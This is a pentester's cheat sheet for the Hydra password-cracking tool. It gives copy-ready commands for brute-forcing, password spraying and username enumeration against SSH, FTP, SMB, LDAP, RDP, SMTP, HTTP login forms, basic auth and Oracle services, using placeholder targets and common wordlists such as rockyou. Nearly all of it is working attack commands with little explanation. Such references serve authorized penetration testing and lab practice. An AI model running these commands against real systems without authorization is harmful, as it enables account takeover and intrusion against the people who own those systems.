Hydra

Password cracker, attacking online systems (not with hash).

For big lists of user, try password=null/username/reverse-username without a wordlist. E.g.: hydra -L users.txt -e nsr $IP ssh -V

Help

hydra

Useful options

-C FILE   colon separated "login:pass" format, instead of -L/-P options
-e nsr    try "n" null password, "s" username=password, "r" try the reverse login as pass
-l username
-L file with usernames
-p password
-P file with passwords
-f / -F   exit when a login/pass pair is found
-t number of threads, default=16

Protocols

adam6500  afp  asterisk  cisco  cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) mysql5 ncp nntp oracle oracle-listener oracle-sid pcanywhere pcnfs  pop3[s]  postgres  rdp radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sapr3 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Graphical Version

# Start XHydra, graphical version of hydra
xhydra

Usage Examples

# USERS can also be a specific account and not in a file. Example USERS=sa for mssql

# Brute force Oracle listener password
./hydra -P <Password File> -t <no of threads> -s 1521 (target default port) <target> oracle-listener
./hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener


# Bruteforce basic authentication
# Password: generate 6 chars, 0-9 and A-Z
hydra -L users.txt -x 6:6:1A "http://domain.com" http-head /path/
hydra -l admin -x 6:6:1A "http://domain.com" http-head /path/ -v

# Bruteforce same username as password, 6 chars 0-9A-Z
URL="domain.com"
URL_PATH="/"
hydra -l yourname -x 6:6:1A -e s "$URL" https-get "$URL_PATH"
# Verbose
hydra -l yourname -x 6:6:1A -e s "$URL" https-get "$URL_PATH" -v

hydra -C /usr/share/wordlists/user_pass.txt "$URL" https-get "$URL_PATH" -v


# Bruteforce using login file (user,pass)
URL="http://domain.com"
hydra -C /usr/share/wordlists/user_pass.txt -v "$URL" https-get

# Bruteforce login as password
URL="http://domain.com"
hydra -l yourname -x 6:6:1A -e s "$URL" https-get /path/login.php


hydra -l admin -P passwords.txt www.somesite.com https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^:&_adminLogin=YES&SAVE=Login"

# SSH
IP=x.x.x.x
hydra -s 22 -l root -P /usr/share/wordlists/rockyou.txt -t 16 $IP ssh

#------------------------
# Resume session
#------------------------
hydra -R

Bruteforce FTP

IP=x.x.x.x
CREDS=/home/kali/creds.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -t 10 -V -f -e nsr -L $USERS -P $WL ftp://$IP
hydra -t 10 -V -f -e nsr -C $CREDS ftp://$IP

Username=password & empty password

hydra -t 10 -V -f -e nsr -L $USERS ftp://$IP

Bruteforce Samba

IP=x.x.x.x
CREDS=/home/kali/creds.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -t 10 -V -f -e nsr -L $USERS -P $WL smb://$IP
hydra -t 10 -V -f -e nsr -C $CREDS smb://$IP

Bruteforce LDAP

USERS=users.txt
IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
PROTOCOL=ldap2 # or ldap3
hydra -t 10 -V -f -e nsr -L $USERS -P $WL $PROTOCOL://$IP

Password Spray

hydra -t 10 -V -f -L $USERS -p "MyDefaultPassword" $PROTOCOL://$IP

Try an empty password 😉

hydra -t 10 -V -f -L $USERS -p "" $PROTOCOL://$IP

Bruteforce RDP

RDP does not reliably handle multiple threads.

IP=x.x.x.x
CREDS=/home/kali/creds.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -l Administrator -P $WL -t 1 -s 3389 $IP rdp
hydra -t 1 -V -f -l administrator -P $WL rdp://${IP}
hydra -e nsr -C $CREDS -t 1 -s 3389 $IP rdp
hydra -l john -p doe rdp://192.168.0.1/firstdomainname
hydra -e nsr -l user1 -P $WL -t 1 -s 3389 rdp://${IP}/DOMAIN

Bruteforce SMTP

Bruteforce usernames

IP=x.x.x.x
USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txt
hydra -L $USERS $IP smtp-enum
hydra smtp-enum://${IP}/vrfy -L $USERS
hydra smtp-enum://${IP}/rcpt -L $USERS

Bruteforce passwords

IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -l root -P $WL $IP smtp
hydra -e nsr -l user@example.com -P $WL $IP smtp
hydra -e nsr -l user@example.com -P $WL -S 565 $IP smtp

Bruteforce HTTP Protocol

Login forms – HTTP POST

This module produces a lot of false positives when using the “failed login” message. Whenever possible, use the “success” message instead or use Burp Pro.

IP=x.x.x.x
PORT=80
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
FAILED_MSG="INVALID LOGIN"
#SUCCESS_MSG="logged in as"
SUCCESS_MSG="302 Found"
COOKIES="cookie1=value1"
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:$FAILED_MSG" -e nsr -l admin -P $WL -vV -f
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:S=$SUCCESS_MSG" -e nsr -l admin -P $WL -vV -f
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:$FAILED_MSG:H=Cookie: ${COOKIES}" -e nsr -l admin -P $WL -vV -f
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:S=$SUCCESS_MSG:H=Cookie: ${COOKIES}" -e nsr -l admin -P $WL -vV -f

HTTP GET – Basic auth

IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -L users.txt -P $WL $IP http-get /webdav/ -v

Bruteforce Oracle SIDs

See Oscanner in Oracle Database.

IP=x.x.x.x
hydra -L /usr/share/oscanner/services.txt -s 1521 $IP oracle-sid

Bruteforce Oracle Weblogic

IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -s 7879 -v -l weblogic -p $WL -t 4 -w 5 -F -m "/" $IP https-get
hydra -e nsr -s 443 -v -l weblogic -p $WL -t 4 -w 5 -F -m "/" $IP https-get